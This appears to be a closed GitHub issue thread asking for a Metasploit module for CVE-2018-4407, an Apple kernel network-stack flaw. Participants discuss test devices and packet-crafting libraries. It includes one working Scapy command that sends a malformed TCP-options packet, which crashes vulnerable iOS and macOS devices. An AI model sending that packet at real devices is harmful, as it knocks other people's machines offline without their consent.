Add exploit for CVE-2018-4407

[FilterUnfiltered]

You think you can add an exploit for CVE-2018-4407? A python version that crashes the phone can be found here and an explanation of the vulnerability can be found here Apple has classified this vulnerability as a remote code execution vulnerability because it may be possible to execute arbitrary code in the kernel, so it should be possible to add support for this exploit.

[Green-m]

I have tested on my devices, but not worked for ios12 and macos 13.6. If there are some vulnerable env that I can reproduce the exploit, I am glad to do it.

[FilterUnfiltered]

after 2 days of failing to set up somewhere where the script worked, I realized all I needed to do was change up the script a bit to work on windows. After that, I tested on my iPad running 10.3.1 and successfully restarted it :)

[FilterUnfiltered]

@Green-m I think Corellium beta has been released which is fucking amazing but yeah lemme check. so yeah it has been released, if you are an IOS developer or researcher or whatever you can get it, idk if you have to be one of those to get it but here is the request page.

[Green-m]

@TheBrokenWasp I am not an IOS researcher, do not know too much about it. @timwr is a specialist about this. cc: @timwr

[wvu]

I was working on a PoC using Scapy first and then PacketFu for Metasploit, but my [redacted] got patched from under me. Currently seeking an environment as well, but it's not high on my list. @timwr should grab this if he's free.

[timwr]

Hi guys I'm currently at a conference so will be busy this week. @wvu-r7 maybe you can share your work in progress?

[FilterUnfiltered]

anybody make any progress yet?

[wvu]

Been busy with CTF development, and I'm not sure anyone wants to see me messing around in PacketFu. The library might need enhancements to do what we need, which is why I was using good ol' Scapy. External modules are a thing.

I also don't have a test device anymore. If someone wants to pick this up, have at it. While I was testing, there wasn't much info on it, but I'm sure there's a lot now.

[FilterUnfiltered]

@wvu-r7 I'll let you test on my iPad mini 2 on IOS 10.3.1 if it's safe 👍

[FilterUnfiltered]

@timwr you back from the conference? It would be great to see this go somewhere :(

[timwr]

My laptop just imploded :( will fix asap

[FilterUnfiltered]

:(

[FilterUnfiltered]

@timwr any progress?

[shilpkar-nitesh]

Hello, guys the exploit isn't working for me. Is it the issue with Scapy, because the errors are mostly scapy based?

[timwr]

What errors are you seeing? This is working for me:

>>> send(IP(dst="192.168.0.2",options=[IPOption("A"*12)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
.
Sent 1 packets.

[FilterUnfiltered]

@timwr make any progress yet? If not, it would be nice to know if and when somebody is going to start on this :(

[timwr]

Is there a reason you're not adding it yourself?

[FilterUnfiltered]

I only know python and have no clue how to code exploits.

[FilterUnfiltered]

still no progress I presume?

[FilterUnfiltered]

So, it has been a few months since I said anything about this but I'm still very hopeful about this getting added. Is anybody working on this or is this dead?

[wvu]

Nothing. :(

[FilterUnfiltered]

Nothing. :(

oh ok... I guess we won't have something as awesome as this xD even though it would be cool to have something like this. If anybody decides to keep trying with this I've got an ios 10.3.1 iPad that I could test it on, as long as it doesn't permanently damage the device xD

[FilterUnfiltered]

6 months later, still no plans or anything on this?

[bcoles]

No-one has posted to say they will work on it. The issue has been assigned to no-one, so Rapid7 aren't working on it, unless they're doing so in secret.

There may be renewed interest if RCE exploit code is ever published.

Sending the required network traffic requires root privileges, which is generally frowned up within the framework, but not totally forbidden.

Presuming that the Metasploit team would accept this module, despite requiring root privileges, writing this module would be a good learning experience for you. Metasploit already makes use of PacketFu as a dependency, which you could use to craft the packet.

[timwr]

@thebrokenwasp can you implement this please? We'd love to add it

[FilterUnfiltered]

@TheBrokenWasp can you implement this please? We'd love to add it

Pretty sure I've said this before, but:

I'm just a skid making suggestions. I'm 14 with too much hw (I doubt other schools give 3 hours worth of hw per night) to even learn C which was my goal. I know a little bit about scripting in python and I've tried to learn buffer overflow exploits, but even starting with stack overflows all videos are outdated. My point is, I have nowhere close enough experience needed to write even the simplest exploit, let alone this. I just like making suggestions for a tool I use so that even though I'm being a skid, I can contribute somehow

[wvu]

@TheBrokenWasp: You're doing fine, mate. And homework sucks, even if it's a necessary evil. I occasionally have nightmares about it still.

I appreciate that you've been submitting these tickets, even if we can't always delegate time to work on them. We might want to close this one because there's been no movement on it. We can reopen if someone wants to tackle it.

[wvu]

Yeah, I'm closing this. Time to dream about homework.